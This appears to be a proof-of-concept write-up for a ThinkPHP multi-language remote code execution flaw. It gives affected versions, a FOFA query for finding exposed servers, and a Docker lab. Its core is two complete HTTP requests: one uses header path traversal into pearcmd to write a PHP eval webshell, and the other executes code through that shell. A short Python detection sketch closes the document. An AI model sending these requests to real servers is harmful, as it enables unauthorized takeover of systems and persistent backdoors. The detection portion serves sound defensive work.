ThinkPHP Multi-Language RCE

Affected versions

This vulnerability affects the following versions:

v6.0.1 < ThinkPHP < v6.0.13
ThinkPHP v5.0.x
ThinkPHP v5.1.x

FOFA query:

header="think_lang"

Requirements:

1. ThinkPHP must have the multi-language feature enabled
2. The pearcmd extension must be present

Reproduction environment:

docker run -it -d -p 8080:80 vulfocus/thinkphp:6.0.12
Visit port 8080

getshell

GET /public/index.php?+config-create+/<?=@eval($_REQUEST['w']);?>+/tmp/nihao2.php HTTP/1.1
Host: 192.168.134.154:8066
User-Agent: Mozilla/9.0 (Macintosh; M2 Mac OS X 16.12; rv:129.0) Gecko/20230101 Firefox/169.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
think-lang:../../../../../../../../usr/local/lib/php/pearcmd
Connection: keep-alive
Cookie: think_lang=zh-cn
Upgrade-Insecure-Requests: 1


phpinfo

POST /public/index.php HTTP/1.1
Host: 192.168.134.154:8066
User-Agent: Mozilla/9.0 (Macintosh; M2 Mac OS X 16.12; rv:129.0) Gecko/20230101 Firefox/169.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
think-lang:../../../../../../../../tmp/nihao2
Connection: keep-alive
Cookie: think_lang=zh-cn
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

w=phpinfo();
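
Both requests above share a recognizable shape: a think-lang header that holds a path instead of a language tag, and a query string that carries pearcmd arguments. The following detection sketch is an added example, not part of the original post; the language-tag pattern, the function names and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed shape of a legitimate language tag such as zh-cn or en-us.
LANG_TAG = re.compile(r"[A-Za-z]{2,3}(?:-[A-Za-z0-9]{2,8})*")

def parse_request(raw):
    """Split a raw HTTP request into (target, headers with lower-cased names)."""
    lines = raw.replace("\r\n", "\n").split("\n\n", 1)[0].split("\n")
    parts = lines[0].split(" ")
    target = " ".join(parts[1:-1]) if len(parts) >= 3 else ""
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return target, headers

def language_values(headers):
    """Yield (source, value) for the two language selectors seen in the requests."""
    if "think-lang" in headers:
        yield "header think-lang", headers["think-lang"]
    for item in headers.get("cookie", "").split(";"):
        name, sep, value = item.strip().partition("=")
        if sep and name == "think_lang":
            yield "cookie think_lang", value

def inspect_request(raw):
    """Return a list of findings; an empty list means nothing was flagged."""
    target, headers = parse_request(raw)
    findings = []
    for source, value in language_values(headers):
        if not LANG_TAG.fullmatch(unquote(value)):
            findings.append(f"{source}: not a language tag: {value!r}")
    query = unquote(target.partition("?")[2])  # unquote() keeps '+' as-is
    if re.search(r"(?:^|\+)config-create\+", query):
        findings.append("query string carries pearcmd-style arguments")
    if "<?" in query:
        findings.append("query string contains a PHP open tag")
    return findings

# Constructed sample requests (not captured traffic).
BENIGN = "GET /public/index.php HTTP/1.1\r\nHost: app.example\r\nCookie: think_lang=zh-cn\r\n\r\n"
SUSPICIOUS = (
    "GET /public/index.php?+config-create+/<?=PLACEHOLDER?>+/tmp/example.php HTTP/1.1\r\n"
    "Host: app.example\r\nthink-lang:../../../../usr/local/lib/php/pearcmd\r\n"
    "Cookie: think_lang=zh-cn\r\n\r\n"
)

if __name__ == "__main__":
    print(inspect_request(BENIGN), inspect_request(SUSPICIOUS))
```

The same allow-pattern check on the language value can be applied at a reverse proxy or WAF in front of versions in the affected range.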
